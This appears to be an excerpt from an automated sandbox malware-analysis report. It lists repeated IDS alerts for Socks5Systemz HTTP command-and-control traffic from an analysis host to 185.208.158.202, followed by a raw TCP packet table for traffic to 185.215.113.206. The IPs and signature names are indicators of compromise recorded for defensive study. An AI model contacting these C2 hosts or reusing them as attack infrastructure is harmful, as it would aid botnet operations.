2024-11-15T14:17:35.225801+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50686	185.208.158.202	80	TCP
2024-11-15T14:17:36.321993+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50687	185.208.158.202	80	TCP
2024-11-15T14:17:36.321993+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50687	185.208.158.202	80	TCP
2024-11-15T14:17:37.379479+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50688	185.208.158.202	80	TCP
2024-11-15T14:17:37.379479+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50688	185.208.158.202	80	TCP
2024-11-15T14:17:38.384429+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50690	185.208.158.202	80	TCP
2024-11-15T14:17:38.384429+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50690	185.208.158.202	80	TCP
2024-11-15T14:17:39.432884+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50691	185.208.158.202	80	TCP
2024-11-15T14:17:39.432884+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50691	185.208.158.202	80	TCP
2024-11-15T14:17:40.460494+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50693	185.208.158.202	80	TCP
2024-11-15T14:17:40.460494+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50693	185.208.158.202	80	TCP
2024-11-15T14:17:41.478010+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50694	185.208.158.202	80	TCP
2024-11-15T14:17:41.478010+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50694	185.208.158.202	80	TCP
2024-11-15T14:17:42.504457+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50696	185.208.158.202	80	TCP
2024-11-15T14:17:42.504457+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50696	185.208.158.202	80	TCP
2024-11-15T14:17:43.521022+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50698	185.208.158.202	80	TCP
2024-11-15T14:17:43.521022+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50698	185.208.158.202	80	TCP
2024-11-15T14:17:44.631226+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50699	185.208.158.202	80	TCP
2024-11-15T14:17:44.631226+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50699	185.208.158.202	80	TCP
2024-11-15T14:17:45.636740+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50701	185.208.158.202	80	TCP
2024-11-15T14:17:45.636740+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50701	185.208.158.202	80	TCP
2024-11-15T14:17:46.704973+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50702	185.208.158.202	80	TCP
2024-11-15T14:17:46.704973+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50702	185.208.158.202	80	TCP
2024-11-15T14:17:47.753363+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50704	185.208.158.202	80	TCP
2024-11-15T14:17:47.753363+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50704	185.208.158.202	80	TCP
2024-11-15T14:17:48.757919+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50705	185.208.158.202	80	TCP
2024-11-15T14:17:48.757919+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50705	185.208.158.202	80	TCP
2024-11-15T14:17:49.746878+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50706	185.208.158.202	80	TCP
2024-11-15T14:17:49.746878+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50706	185.208.158.202	80	TCP
2024-11-15T14:17:50.758400+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50708	185.208.158.202	80	TCP
2024-11-15T14:17:50.758400+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50708	185.208.158.202	80	TCP
2024-11-15T14:17:51.783100+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50709	185.208.158.202	80	TCP
2024-11-15T14:17:51.783100+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50709	185.208.158.202	80	TCP
2024-11-15T14:17:53.022900+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50711	185.208.158.202	80	TCP
2024-11-15T14:17:53.022900+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50711	185.208.158.202	80	TCP
2024-11-15T14:17:54.056489+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50713	185.208.158.202	80	TCP
2024-11-15T14:17:54.056489+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50713	185.208.158.202	80	TCP
2024-11-15T14:17:55.074786+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50714	185.208.158.202	80	TCP
2024-11-15T14:17:55.074786+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50714	185.208.158.202	80	TCP
2024-11-15T14:17:56.103528+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50716	185.208.158.202	80	TCP
2024-11-15T14:17:56.103528+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50716	185.208.158.202	80	TCP
2024-11-15T14:17:57.160287+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50717	185.208.158.202	80	TCP
2024-11-15T14:17:57.160287+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50717	185.208.158.202	80	TCP
2024-11-15T14:17:58.171483+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50719	185.208.158.202	80	TCP
2024-11-15T14:17:58.171483+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50719	185.208.158.202	80	TCP
2024-11-15T14:17:59.202553+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50720	185.208.158.202	80	TCP
2024-11-15T14:17:59.202553+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50720	185.208.158.202	80	TCP
2024-11-15T14:18:00.206738+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50722	185.208.158.202	80	TCP
2024-11-15T14:18:00.206738+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50722	185.208.158.202	80	TCP
2024-11-15T14:18:01.284982+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50723	185.208.158.202	80	TCP
2024-11-15T14:18:01.284982+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50723	185.208.158.202	80	TCP
2024-11-15T14:18:02.282557+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50724	185.208.158.202	80	TCP
2024-11-15T14:18:02.282557+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50724	185.208.158.202	80	TCP
2024-11-15T14:18:03.305465+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50726	185.208.158.202	80	TCP
2024-11-15T14:18:03.305465+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50726	185.208.158.202	80	TCP
2024-11-15T14:18:04.332647+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50727	185.208.158.202	80	TCP
2024-11-15T14:18:04.332647+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50727	185.208.158.202	80	TCP
2024-11-15T14:18:05.359090+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50729	185.208.158.202	80	TCP
2024-11-15T14:18:05.359090+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50729	185.208.158.202	80	TCP
2024-11-15T14:18:06.408504+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50730	185.208.158.202	80	TCP
2024-11-15T14:18:06.408504+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50730	185.208.158.202	80	TCP
2024-11-15T14:18:07.426790+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50731	185.208.158.202	80	TCP
2024-11-15T14:18:07.426790+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50731	185.208.158.202	80	TCP
2024-11-15T14:18:08.440609+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50733	185.208.158.202	80	TCP
2024-11-15T14:18:08.440609+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50733	185.208.158.202	80	TCP
2024-11-15T14:18:09.484583+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50735	185.208.158.202	80	TCP
2024-11-15T14:18:09.484583+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50735	185.208.158.202	80	TCP
2024-11-15T14:18:10.525148+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50737	185.208.158.202	80	TCP
2024-11-15T14:18:10.525148+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50737	185.208.158.202	80	TCP
2024-11-15T14:18:11.535780+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50738	185.208.158.202	80	TCP
2024-11-15T14:18:11.535780+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50738	185.208.158.202	80	TCP
2024-11-15T14:18:12.544500+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50740	185.208.158.202	80	TCP
2024-11-15T14:18:12.544500+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50740	185.208.158.202	80	TCP
2024-11-15T14:18:13.555939+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50742	185.208.158.202	80	TCP
2024-11-15T14:18:13.555939+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50742	185.208.158.202	80	TCP
2024-11-15T14:18:14.539462+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50743	185.208.158.202	80	TCP
2024-11-15T14:18:14.539462+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50743	185.208.158.202	80	TCP
2024-11-15T14:18:15.541296+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50745	185.208.158.202	80	TCP
2024-11-15T14:18:15.541296+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50745	185.208.158.202	80	TCP
2024-11-15T14:18:16.567785+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50746	185.208.158.202	80	TCP
2024-11-15T14:18:16.567785+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50746	185.208.158.202	80	TCP
2024-11-15T14:18:17.611601+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50747	185.208.158.202	80	TCP
2024-11-15T14:18:17.611601+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50747	185.208.158.202	80	TCP
2024-11-15T14:18:18.619893+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50749	185.208.158.202	80	TCP
2024-11-15T14:18:18.619893+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50749	185.208.158.202	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 15, 2024 14:09:06.842987061 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:06.848073959 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:06.848155022 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:06.848272085 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:06.853205919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:07.785329103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:07.785459042 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:07.787697077 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:07.792798996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.091519117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.095355034 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.102161884 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.108004093 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.391510010 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.391539097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.391567945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.391606092 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.392666101 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.397783041 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.556741953 CET	49675	443	192.168.2.4	173.222.162.32
Nov 15, 2024 14:09:08.685065031 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.685096979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.685118914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.685127020 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.685127020 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.685172081 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.685352087 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.685369015 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.685395956 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.685410976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.685412884 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.685503006 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.687020063 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:08.692281961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.976816893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:08.977752924 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:09.043133974 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:09.043134928 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:09.048230886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:09.048288107 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:09.048300982 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:09.048312902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:09.048377991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:09.048485041 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:09.048542023 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:09.845065117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:09.845623970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.086363077 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.091445923 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374176025 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374187946 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374198914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374228001 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.374258041 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.374284029 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374294996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374322891 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.374341965 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.374672890 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374684095 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374694109 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374717951 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.374733925 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.374850035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374866009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.374883890 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.374911070 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.375390053 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.375458002 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538016081 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538047075 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538063049 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538077116 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538078070 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538094997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538120031 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538120031 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538156986 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538335085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538367987 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538371086 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538386106 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538403034 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538408041 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538429022 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538448095 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538559914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538575888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538597107 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538609982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538723946 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538741112 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.538769007 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.538785934 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.539241076 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.539283991 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.539366007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.539370060 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.539418936 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.539437056 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.539566040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.539598942 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.539606094 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.539633989 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.540147066 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.540188074 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.540215015 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.540231943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.540261030 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.540277004 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.540389061 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.540405989 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.540437937 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.540453911 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.701906919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.701951981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.701967955 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.701965094 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.701982021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.702003956 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.702009916 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.702009916 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.702013016 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.702020884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.702055931 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.702086926 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.702353001 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.702363968 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.702374935 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.702387094 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.702390909 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.702413082 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.702481031 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.702723980 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.702742100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.702775955 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.702790976 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.703010082 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703025103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703038931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703059912 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.703079939 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.703181982 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703201056 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703218937 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703238010 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.703264952 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.703516960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703531027 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703562021 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.703608036 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.703696966 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703711987 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703752995 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.703876972 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703891039 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703903913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703919888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703929901 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.703937054 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.703944921 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.703977108 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.704421997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.704437017 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.704451084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.704473972 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.704488993 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.704601049 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.704617023 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.704629898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.704647064 CET	80	49730	185.215.113.206	192.168.2.4
